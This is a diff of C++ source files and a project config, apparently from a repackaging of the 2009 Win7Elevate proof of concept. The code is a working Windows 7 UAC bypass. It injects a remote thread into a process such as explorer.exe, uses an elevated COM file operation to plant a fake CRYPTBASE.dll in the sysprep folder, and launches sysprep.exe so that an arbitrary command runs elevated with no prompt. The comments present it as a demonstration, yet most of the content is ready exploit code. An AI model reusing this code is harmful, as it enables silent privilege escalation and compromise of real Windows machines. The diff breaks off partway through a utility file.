<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|x64'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|x64'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
|
|
@ -0,0 +1,455 @@
|
|||
#include "stdafx.h"
|
||||
#include "Win7Elevate_Utils.h"
|
||||
#include "Win7Elevate_Inject.h"
|
||||
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
|
||||
// (Minor tidy-up 12th June 2009 for the code's public release.)
|
||||
// http://www.pretentiousname.com
|
||||
// leo@ox.compsoc.net
|
||||
//
|
||||
// Using any part of this code for malicious purposes is expressly forbidden.
|
||||
//
|
||||
// This proof-of-concept code is intended only to demonstrate that code-injection
|
||||
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
|
||||
|
||||
struct InjectArgs
|
||||
{
|
||||
BOOL (WINAPI *fpFreeLibrary)(HMODULE hLibModule);
|
||||
HMODULE (WINAPI *fpLoadLibrary)(LPCWSTR lpLibFileName);
|
||||
FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
|
||||
BOOL (WINAPI *fpCloseHandle)(HANDLE);
|
||||
DWORD (WINAPI *fpWaitForSingleObject)(HANDLE,DWORD);
|
||||
const wchar_t *szSourceDll;
|
||||
const wchar_t *szElevDir;
|
||||
const wchar_t *szElevDll;
|
||||
const wchar_t *szElevDllFull;
|
||||
const wchar_t *szElevExeFull;
|
||||
wchar_t *szElevArgs; // Not const because of CreateProcess's in-place buffer modification. It's really not const so this is fine. (We don't use CreateProcess anymore but it doesn't hurt to keep this non-const just in case.)
|
||||
const wchar_t *szEIFOMoniker; // szElevatedIFileOperationMoniker
|
||||
const IID *pIID_EIFOClass;
|
||||
const IID *pIID_EIFO;
|
||||
const IID *pIID_ShellItem2;
|
||||
const IID *pIID_Unknown;
|
||||
const wchar_t *szShell32;
|
||||
const wchar_t *szOle32;
|
||||
const char *szCoInitialize;
|
||||
const char *szCoUninitialize;
|
||||
const char *szCoGetObject;
|
||||
const char *szCoCreateInstance;
|
||||
const char *szSHCreateItemFPN; // SHCreateItemFromParsingName
|
||||
const char *szShellExecuteExW;
|
||||
};
|
||||
|
||||
static DWORD WINAPI RemoteCodeFunc(LPVOID lpThreadParameter)
|
||||
{
|
||||
// This is the injected code of "part 1."
|
||||
|
||||
// As this code is copied into another process it cannot refer to any static data (i.e. no string, GUID, etc. constants)
|
||||
// and it can only directly call functions that are within Kernel32.dll (which is all we need as it lets us call
|
||||
// LoadLibrary and GetProcAddress). The data we need (strings, GUIDs, etc.) is copied into the remote process and passed to
|
||||
// us in our InjectArgs structure.
|
||||
|
||||
// The compiler settings are important. You have to ensure that RemoteCodeFunc doesn't do any stack checking (since it
|
||||
// involves a call into the CRT which may not exist (in the same place) in the target process) and isn't made inline
|
||||
// or anything like that. (Compiler optimizations are best turned off.) You need RemoteCodeFunc to be compiled into a
|
||||
// contiguous chunk of assembler that calls/reads/writes nothing except its own stack variables and what is passed to it via pArgs.
|
||||
|
||||
// It's also important that all asm jump instructions in this code use relative addressing, not absolute. Jumps to absolute
|
||||
// addresses will not be valid after the code is copied to a different address in the target process. Visual Studio seems
|
||||
// to use absolute addresses sometimes and relative ones at other times and I'm not sure what triggers one or the other. For example,
|
||||
// I had a problem with it turning a lot of the if-statements in this code into absolute jumps when compiled for 32-bit and that
|
||||
// seemed to go away when I set the Release build to generate a PDF file, but then they came back again.
|
||||
// I never had this problem in February, and 64-bit builds always seem fine, but now in June I'm getting the problem with 32-bit
|
||||
// builds on my main machine. However, if I switch to the older compiler install and older Windows SDK that I have on another machine
|
||||
// it always builds a working 32-bit (and 64-bit) version, just like it used to. So I guess something in the compiler/SDK has triggered
|
||||
// this change but I don't know what. It could just be that things have moved around in memory due to a structure size change and that's
|
||||
// triggering the different modes... I don't know!
|
||||
//
|
||||
// So if the 32-bit version crashes the process you inject into, you probably need to work out how to convince the compiler
|
||||
// to generate the code it used to in February. :) Or you could write some code to fix up the jump instructions after copying them,
|
||||
// or hand-code the 32-bit asm (seems you can ignore 64-bit as it always works so far), or find a style of if-statement (or equivalent)
|
||||
// that always generates relative jumps, or whatever...
|
||||
//
|
||||
// Take a look at the asm_code_issue.png image that comes with the source to see what the absolute and relative jumps look like.
|
||||
//
|
||||
// PS: I've never written Intel assembler, and it's many years since I've hand-written any type of assembler, so I may have the wrong end
|
||||
// of the stick about some of this! Either way, 32-bit version works when built on my older compiler/SDK install and usually doesn't on
|
||||
// the newer install.
|
||||
|
||||
InjectArgs * pArgs = reinterpret_cast< InjectArgs * >(lpThreadParameter);
|
||||
|
||||
// Use an elevated FileOperation object to copy a file to a protected folder.
|
||||
// If we're in a process that can do silent COM elevation then we can do this without any prompts.
|
||||
|
||||
HMODULE hModuleOle32 = pArgs->fpLoadLibrary(pArgs->szOle32);
|
||||
HMODULE hModuleShell32 = pArgs->fpLoadLibrary(pArgs->szShell32);
|
||||
|
||||
if (hModuleOle32
|
||||
&& hModuleShell32)
|
||||
{
|
||||
// Load the non-Kernel32.dll functions that we need.
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPVOID pvReserved) >
|
||||
tfpCoInitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoInitialize );
|
||||
|
||||
W7EUtils::GetProcAddr< void (STDAPICALLTYPE *)(void) >
|
||||
tfpCoUninitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoUninitialize );
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) >
|
||||
tfpCoGetObject( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoGetObject );
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) >
|
||||
tfpCoCreateInstance( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoCreateInstance );
|
||||
|
||||
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) >
|
||||
tfpSHCreateItemFromParsingName( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szSHCreateItemFPN );
|
||||
|
||||
W7EUtils::GetProcAddr< BOOL (STDAPICALLTYPE *)(LPSHELLEXECUTEINFOW lpExecInfo) >
|
||||
tfpShellExecuteEx( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szShellExecuteExW );
|
||||
|
||||
if (0 != tfpCoInitialize.f
|
||||
&& 0 != tfpCoUninitialize.f
|
||||
&& 0 != tfpCoGetObject.f
|
||||
&& 0 != tfpCoCreateInstance.f
|
||||
&& 0 != tfpSHCreateItemFromParsingName.f
|
||||
&& 0 != tfpShellExecuteEx.f)
|
||||
{
|
||||
if (S_OK == tfpCoInitialize.f(NULL))
|
||||
{
|
||||
BIND_OPTS3 bo;
|
||||
for(int i = 0; i < sizeof(bo); ++i) { reinterpret_cast< BYTE * >(&bo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
|
||||
bo.cbStruct = sizeof(bo);
|
||||
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
|
||||
|
||||
// For testing other COM objects/methods, start here.
|
||||
{
|
||||
IFileOperation *pFileOp = 0;
|
||||
IShellItem *pSHISource = 0;
|
||||
IShellItem *pSHIDestination = 0;
|
||||
IShellItem *pSHIDelete = 0;
|
||||
|
||||
// This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection.
|
||||
if (
|
||||
(pArgs->szEIFOMoniker && S_OK == tfpCoGetObject.f( pArgs->szEIFOMoniker, &bo, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
|
||||
|| (pArgs->pIID_EIFOClass && S_OK == tfpCoCreateInstance.f( *pArgs->pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER|CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
|
||||
)
|
||||
if (0 != pFileOp)
|
||||
if (S_OK == pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION))
|
||||
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szSourceDll, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)))
|
||||
if (0 != pSHISource)
|
||||
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDir, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)))
|
||||
if (0 != pSHIDestination)
|
||||
if (S_OK == pFileOp->CopyItem(pSHISource, pSHIDestination, pArgs->szElevDll, NULL))
|
||||
if (S_OK == pFileOp->PerformOperations())
|
||||
{
|
||||
// Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call.
|
||||
// (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.)
|
||||
SHELLEXECUTEINFO shinfo;
|
||||
for(int i = 0; i < sizeof(shinfo); ++i) { reinterpret_cast< BYTE * >(&shinfo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
|
||||
shinfo.cbSize = sizeof(shinfo);
|
||||
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
|
||||
shinfo.lpFile = pArgs->szElevExeFull;
|
||||
shinfo.lpParameters = pArgs->szElevArgs;
|
||||
shinfo.lpDirectory = pArgs->szElevDir;
|
||||
shinfo.nShow = SW_SHOW;
|
||||
|
||||
if (tfpShellExecuteEx.f(&shinfo) && shinfo.hProcess != NULL)
|
||||
{
|
||||
// Wait for the "part 2" target process to finish.
|
||||
pArgs->fpWaitForSingleObject(shinfo.hProcess, INFINITE);
|
||||
|
||||
pArgs->fpCloseHandle(shinfo.hProcess);
|
||||
}
|
||||
|
||||
// Another standard call to IFileOperation, this time to delete our dummy DLL. We clean up our mess.
|
||||
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDllFull, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDelete)))
|
||||
if (0 != pSHIDelete)
|
||||
if (S_OK == pFileOp->DeleteItem(pSHIDelete, NULL))
|
||||
{
|
||||
pFileOp->PerformOperations();
|
||||
}
|
||||
}
|
||||
|
||||
if (pSHIDelete) { pSHIDelete->Release(); }
|
||||
if (pSHIDestination) { pSHIDestination->Release(); }
|
||||
if (pSHISource) { pSHISource->Release(); }
|
||||
if (pFileOp) { pFileOp->Release(); }
|
||||
}
|
||||
|
||||
tfpCoUninitialize.f();
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (hModuleShell32) { pArgs->fpFreeLibrary(hModuleShell32); }
|
||||
if (hModuleOle32) { pArgs->fpFreeLibrary(hModuleOle32); }
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
// Marks the end of the function so we know how much data to copy.
|
||||
volatile static void DummyRemoteCodeFuncEnd()
|
||||
{
|
||||
}
|
||||
|
||||
void W7EInject::AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
|
||||
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
|
||||
const wchar_t *szPathToOurDll,
|
||||
DWORD (__stdcall *Redirector)(void))
|
||||
{
|
||||
bool bThreadWaitSuccess = false;
|
||||
bool bThreadWaitFailure = false;
|
||||
HANDLE hTargetProc = NULL;
|
||||
|
||||
const BYTE * codeStartAdr = reinterpret_cast< const BYTE * >( &RemoteCodeFunc );
|
||||
const BYTE * codeEndAdr = reinterpret_cast< const BYTE * >( &DummyRemoteCodeFuncEnd );
|
||||
|
||||
if (codeStartAdr >= codeEndAdr)
|
||||
{
|
||||
//MessageBox(hWnd, L"Unexpected function layout", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Unexpected function layout");
|
||||
return;
|
||||
}
|
||||
|
||||
wchar_t szPathToSelf[MAX_PATH];
|
||||
|
||||
DWORD dwGMFNRes = GetModuleFileName(NULL, szPathToSelf, _countof(szPathToSelf));
|
||||
|
||||
if (dwGMFNRes == 0 || dwGMFNRes >= _countof(szPathToSelf))
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't get path to self", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Couldn't get path to self");
|
||||
return;
|
||||
}
|
||||
|
||||
wchar_t szProgramFiles[MAX_PATH];
|
||||
|
||||
HRESULT hr = SHGetFolderPath(NULL, CSIDL_PROGRAM_FILES, NULL, SHGFP_TYPE_CURRENT, szProgramFiles);
|
||||
|
||||
if (S_OK != hr)
|
||||
{
|
||||
//MessageBox(hWnd, L"SHGetFolderPath failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"SHGetFolderPath failed");
|
||||
return;
|
||||
}
|
||||
|
||||
HMODULE hModKernel32 = LoadLibrary(L"kernel32.dll");
|
||||
|
||||
if (hModKernel32 == 0)
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't load kernel32.dll", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Couldn't load kernel32.dll");
|
||||
return;
|
||||
}
|
||||
|
||||
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HMODULE) > tfpFreeLibrary( &GetProcAddress, hModKernel32, "FreeLibrary");
|
||||
W7EUtils::GetProcAddr< HMODULE (WINAPI *)(LPCWSTR) > tfpLoadLibrary( &GetProcAddress, hModKernel32, "LoadLibraryW");
|
||||
W7EUtils::GetProcAddr< FARPROC (WINAPI *)(HMODULE, LPCSTR) > tfpGetProcAddress( &GetProcAddress, hModKernel32, "GetProcAddress");
|
||||
W7EUtils::GetProcAddr< BOOL (WINAPI *)(HANDLE) > tfpCloseHandle( &GetProcAddress, hModKernel32, "CloseHandle");
|
||||
W7EUtils::GetProcAddr< DWORD (WINAPI *)(HANDLE,DWORD) > tfpWaitForSingleObject( &GetProcAddress, hModKernel32, "WaitForSingleObject");
|
||||
|
||||
if (0 == tfpFreeLibrary.f
|
||||
|| 0 == tfpLoadLibrary.f
|
||||
|| 0 == tfpGetProcAddress.f
|
||||
|| 0 == tfpCloseHandle.f
|
||||
|| 0 == tfpWaitForSingleObject.f)
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't find API", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Couldn't find API");
|
||||
}
|
||||
else
|
||||
{
|
||||
// Here we define the target process and DLL for "part 2." This is an auto/silent-elevating process which isn't
|
||||
// directly below System32 and which loads a DLL which is directly below System32 but isn't on the OS's "Known DLLs" list.
|
||||
// If we copy our own DLL with the same name to the exe's folder then the exe will load our DLL instead of the real one.
|
||||
const wchar_t *szElevDir = L"C:\\Windows\\System32\\sysprep";
|
||||
const wchar_t *szElevDll = L"CRYPTBASE.dll";
|
||||
const wchar_t *szElevDllFull = L"C:\\Windows\\System32\\sysprep\\CRYPTBASE.dll";
|
||||
const wchar_t *szElevExeFull = L"C:\\Windows\\System32\\sysprep\\sysprep.exe";
|
||||
std::wstring strElevArgs = L"\"";
|
||||
// strElevArgs += szElevExeFull;
|
||||
// strElevArgs += L"\" \"";
|
||||
strElevArgs += szCmd;
|
||||
strElevArgs += L"\" \"";
|
||||
strElevArgs += szDir;
|
||||
strElevArgs += L"\" \"";
|
||||
for (const wchar_t *pCmdArgChar = szArgs; *szArgs; ++szArgs)
|
||||
{
|
||||
if (*szArgs != L'\"')
|
||||
{
|
||||
strElevArgs += *szArgs;
|
||||
}
|
||||
else
|
||||
{
|
||||
strElevArgs += L"\"\"\""; // Turn each quote into three to preserve them in the arguments.
|
||||
}
|
||||
}
|
||||
strElevArgs += L"\"";
|
||||
|
||||
if (!bInject)
|
||||
{
|
||||
// Test code without remoting.
|
||||
// This should result in a UAC prompt, if UAC is on at all and we haven't been launched as admin.
|
||||
|
||||
// Satisfy CreateProcess's non-const args requirement
|
||||
wchar_t *szElevArgsNonConst = new wchar_t[strElevArgs.length() + 1];
|
||||
wcscpy_s(szElevArgsNonConst, strElevArgs.length() + 1, strElevArgs.c_str());
|
||||
|
||||
InjectArgs ia;
|
||||
ia.fpFreeLibrary = tfpFreeLibrary.f;
|
||||
ia.fpLoadLibrary = tfpLoadLibrary.f;
|
||||
ia.fpGetProcAddress = tfpGetProcAddress.f;
|
||||
ia.fpCloseHandle = tfpCloseHandle.f;
|
||||
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
|
||||
ia.szSourceDll = szPathToOurDll;
|
||||
ia.szElevDir = szElevDir;
|
||||
ia.szElevDll = szElevDll;
|
||||
ia.szElevDllFull = szElevDllFull;
|
||||
ia.szElevExeFull = szElevExeFull;
|
||||
ia.szElevArgs = szElevArgsNonConst;
|
||||
ia.szShell32 = L"shell32.dll";
|
||||
ia.szOle32 = L"ole32.dll";
|
||||
ia.szCoInitialize = "CoInitialize";
|
||||
ia.szCoUninitialize = "CoUninitialize";
|
||||
ia.szCoGetObject = "CoGetObject";
|
||||
ia.szCoCreateInstance = "CoCreateInstance";
|
||||
ia.szSHCreateItemFPN = "SHCreateItemFromParsingName";
|
||||
ia.szShellExecuteExW = "ShellExecuteExW";
|
||||
ia.szEIFOMoniker = bElevate ? L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" : NULL;
|
||||
ia.pIID_EIFOClass = bElevate ? NULL : &__uuidof(FileOperation);
|
||||
ia.pIID_EIFO = &__uuidof(IFileOperation);
|
||||
ia.pIID_ShellItem2 = &__uuidof(IShellItem2);
|
||||
ia.pIID_Unknown = &__uuidof(IUnknown);
|
||||
|
||||
RemoteCodeFunc(&ia);
|
||||
|
||||
delete[] szElevArgsNonConst;
|
||||
}
|
||||
else if (W7EUtils::OpenProcessToInject(hWnd, &hTargetProc, dwPid, szProcName))
|
||||
{
|
||||
// Test code with remoting.
|
||||
// At least as of RC1 build 7100, with the default OS settings, this will run the specified command
|
||||
// with elevation but without triggering a UAC prompt.
|
||||
|
||||
// Scope CRemoteMemory so it's destroyed before the process handle is closed.
|
||||
{
|
||||
W7EUtils::CRemoteMemory reme(hTargetProc);
|
||||
|
||||
InjectArgs ia;
|
||||
// ASSUMPTION: Remote process has same ASLR setting as us (i.e. ASLR = on)
|
||||
// kernel32.dll is mapped to the same address range in both processes.
|
||||
ia.fpFreeLibrary = tfpFreeLibrary.f;
|
||||
ia.fpLoadLibrary = tfpLoadLibrary.f;
|
||||
ia.fpGetProcAddress = tfpGetProcAddress.f;
|
||||
ia.fpCloseHandle = tfpCloseHandle.f;
|
||||
ia.fpWaitForSingleObject = tfpWaitForSingleObject.f;
|
||||
|
||||
// It would be more efficient to allocate and copy the data in one
|
||||
// block but since this is just a proof-of-concept I don't bother.
|
||||
|
||||
ia.szSourceDll = reme.AllocAndCopyMemory(szPathToOurDll);
|
||||
ia.szElevDir = reme.AllocAndCopyMemory(szElevDir);
|
||||
ia.szElevDll = reme.AllocAndCopyMemory(szElevDll);
|
||||
ia.szElevDllFull = reme.AllocAndCopyMemory(szElevDllFull);
|
||||
ia.szElevExeFull = reme.AllocAndCopyMemory(szElevExeFull);
|
||||
ia.szElevArgs = reme.AllocAndCopyMemory(strElevArgs.c_str(), false); // Leave this page writeable for CreateProcess.
|
||||
|
||||
ia.szShell32 = reme.AllocAndCopyMemory(L"shell32.dll");
|
||||
ia.szOle32 = reme.AllocAndCopyMemory(L"ole32.dll");
|
||||
ia.szCoInitialize = reme.AllocAndCopyMemory("CoInitialize");
|
||||
ia.szCoUninitialize = reme.AllocAndCopyMemory("CoUninitialize");
|
||||
ia.szCoGetObject = reme.AllocAndCopyMemory("CoGetObject");
|
||||
ia.szCoCreateInstance = reme.AllocAndCopyMemory("CoCreateInstance");
|
||||
ia.szSHCreateItemFPN = reme.AllocAndCopyMemory("SHCreateItemFromParsingName");
|
||||
ia.szShellExecuteExW = reme.AllocAndCopyMemory("ShellExecuteExW");
|
||||
ia.szEIFOMoniker = bElevate ? reme.AllocAndCopyMemory(L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}") : NULL;
|
||||
ia.pIID_EIFOClass = bElevate ? NULL : reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(FileOperation), sizeof(__uuidof(FileOperation)), false) );
|
||||
ia.pIID_EIFO = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IFileOperation), sizeof(__uuidof(IFileOperation)), false) );
|
||||
ia.pIID_ShellItem2 = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IShellItem2), sizeof(__uuidof(IShellItem2)), false) );
|
||||
ia.pIID_Unknown = reinterpret_cast< const IID * >( reme.AllocAndCopyMemory(&__uuidof(IUnknown), sizeof(__uuidof(IUnknown)), false) );
|
||||
|
||||
void *pRemoteArgs = reme.AllocAndCopyMemory(&ia, sizeof(ia), false);
|
||||
|
||||
void *pRemoteFunc = reme.AllocAndCopyMemory( RemoteCodeFunc, codeEndAdr - codeStartAdr, true);
|
||||
|
||||
if (reme.AnyFailures())
|
||||
{
|
||||
//MessageBox(hWnd, L"Remote allocation failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Remote allocation failed");
|
||||
}
|
||||
else
|
||||
{
|
||||
HANDLE hRemoteThread = CreateRemoteThread(hTargetProc, NULL, 0, reinterpret_cast< LPTHREAD_START_ROUTINE >( pRemoteFunc ), pRemoteArgs, 0, NULL);
|
||||
|
||||
if (hRemoteThread == 0)
|
||||
{
|
||||
//MessageBox(hWnd, L"Couldn't create remote thread", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(
|
||||
CError::Format(
|
||||
GetLastError(),
|
||||
L"Couldn't create remote thread",
|
||||
L"CreateRemoteThread"));
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
if ( Redirector )
|
||||
Redirector();
|
||||
|
||||
while(true)
|
||||
{
|
||||
DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 10000);
|
||||
|
||||
if (dwWaitRes == WAIT_OBJECT_0)
|
||||
{
|
||||
bThreadWaitSuccess = true;
|
||||
break;
|
||||
}
|
||||
else if (dwWaitRes != WAIT_TIMEOUT)
|
||||
{
|
||||
bThreadWaitFailure = true;
|
||||
break;
|
||||
}
|
||||
//else if (IDCANCEL == MessageBox(hWnd, L"Continue waiting for remote thread to complete?", L"Win7Elevate", MB_OKCANCEL | MB_ICONQUESTION))
|
||||
else
|
||||
{
|
||||
CLogger::LogLine(L"Continue waiting for remote thread to complete? : NO");
|
||||
// See if it completed before the user asked to stop waiting.
|
||||
// Code that wasn't just a proof-of-concept would use a worker thread that could cancel the wait UI.
|
||||
if (WAIT_OBJECT_0 == WaitForSingleObject(hRemoteThread, 0))
|
||||
{
|
||||
bThreadWaitSuccess = true;
|
||||
}
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (!bThreadWaitSuccess)
|
||||
{
|
||||
// The memory in the other process could still be in use.
|
||||
// Freeing it now will almost certainly crash the other process.
|
||||
// Letting it leak is the lesser of two evils...
|
||||
reme.LeakMemory();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
CloseHandle(hTargetProc);
|
||||
}
|
||||
}
|
||||
|
||||
FreeLibrary(hModKernel32);
|
||||
|
||||
if (bThreadWaitFailure)
|
||||
{
|
||||
//MessageBox(hWnd, L"Error waiting on the remote thread to complete", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Error waiting on the remote thread to complete");
|
||||
}
|
||||
else if (bThreadWaitSuccess)
|
||||
{
|
||||
//MessageBox(hWnd, L"Remote thread completed", L"Win7Elevate", MB_OK | MB_ICONINFORMATION);
|
||||
CLogger::LogLine(L"Remote thread completed");
|
||||
}
|
||||
}
|
|
@ -0,0 +1,9 @@
|
|||
#pragma once
|
||||
|
||||
namespace W7EInject
|
||||
{
|
||||
void AttemptOperation(HWND hWnd, bool bInject, bool bElevate, DWORD dwPid, const wchar_t *szProcName,
|
||||
const wchar_t *szCmd, const wchar_t *szArgs, const wchar_t *szDir,
|
||||
const wchar_t *szPathToOurDll,
|
||||
DWORD (__stdcall *Redirector)(void));
|
||||
}
|
|
@ -0,0 +1,347 @@
|
|||
#include "stdafx.h"
|
||||
#include "Win7Elevate_Utils.h"
|
||||
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
|
||||
// (Minor tidy-up 12th June 2009 for the code's public release.)
|
||||
// http://www.pretentiousname.com
|
||||
// leo@ox.compsoc.net
|
||||
//
|
||||
// Using any part of this code for malicious purposes is expressly forbidden.
|
||||
//
|
||||
// This proof-of-concept code is intended only to demonstrate that code-injection
|
||||
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
|
||||
//
|
||||
// Win7Elevate_Inject.cpp is the most interesting file. Most of the rest is just boilerplate UI/util code.
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
bool W7EUtils::GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs)
|
||||
{
|
||||
// Note: We probably need to target a process which has the same ASLR setting as us, i.e. ON.
|
||||
// Explorer.exe is our default since it has ASLR on, is always running and can do the COM silent-elevation stuff by default.
|
||||
|
||||
bool bResult = false;
|
||||
|
||||
mapProcs.clear();
|
||||
|
||||
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
|
||||
|
||||
if (hSnapshot == INVALID_HANDLE_VALUE)
|
||||
{
|
||||
//MessageBox(hWnd, L"CreateToolhelp32Snapshot failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"CreateToolhelp32Snapshot failed");
|
||||
}
|
||||
else
|
||||
{
|
||||
bool bFirst = true;
|
||||
PROCESSENTRY32 pe;
|
||||
|
||||
while(true)
|
||||
{
|
||||
ZeroMemory(&pe, sizeof(pe));
|
||||
pe.dwSize = sizeof(pe);
|
||||
|
||||
BOOL bPR = FALSE;
|
||||
|
||||
if (bFirst)
|
||||
{
|
||||
bFirst = false;
|
||||
bPR = Process32First(hSnapshot, &pe);
|
||||
}
|
||||
else
|
||||
{
|
||||
bPR = Process32Next(hSnapshot, &pe);
|
||||
}
|
||||
|
||||
if (!bPR)
|
||||
{
|
||||
DWORD dwErr = GetLastError();
|
||||
|
||||
if (ERROR_NO_MORE_FILES != dwErr)
|
||||
{
|
||||
//MessageBox(hWnd, L"Process32Next/First failed", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Process32Next/First failed");
|
||||
}
|
||||
else if (mapProcs.empty())
|
||||
{
|
||||
//MessageBox(hWnd, L"Process32Next/First returned nothing", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"Process32Next/First returned nothing");
|
||||
}
|
||||
else
|
||||
{
|
||||
bResult = true;
|
||||
}
|
||||
|
||||
break; // Stop enumerating.
|
||||
}
|
||||
|
||||
// Only insert processes that we can open
|
||||
|
||||
HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe.th32ProcessID);
|
||||
|
||||
if (hProc != 0)
|
||||
{
|
||||
CloseHandle(hProc);
|
||||
mapProcs.insert( std::make_pair( pe.th32ProcessID, pe.szExeFile ) );
|
||||
}
|
||||
}
|
||||
|
||||
CloseHandle(hSnapshot);
|
||||
}
|
||||
|
||||
return bResult;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
bool W7EUtils::OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName)
|
||||
{
|
||||
*pOutProcHandle = 0;
|
||||
|
||||
if (szProcName == NULL)
|
||||
{
|
||||
//MessageBox(hWnd, L"No process name passed in", L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(L"No process name passed in");
|
||||
return false;
|
||||
}
|
||||
|
||||
*pOutProcHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
|
||||
|
||||
if (*pOutProcHandle == 0)
|
||||
{
|
||||
DWORD dwError = GetLastError();
|
||||
|
||||
wchar_t szPID[128];
|
||||
_itow_s(dwPid, szPID, _countof(szPID), 10);
|
||||
|
||||
wchar_t szError[128];
|
||||
_itow_s(dwError, szError, _countof(szError), 10);
|
||||
|
||||
std::wstring strMsg = L"Couldn't open process ";
|
||||
strMsg += szProcName;
|
||||
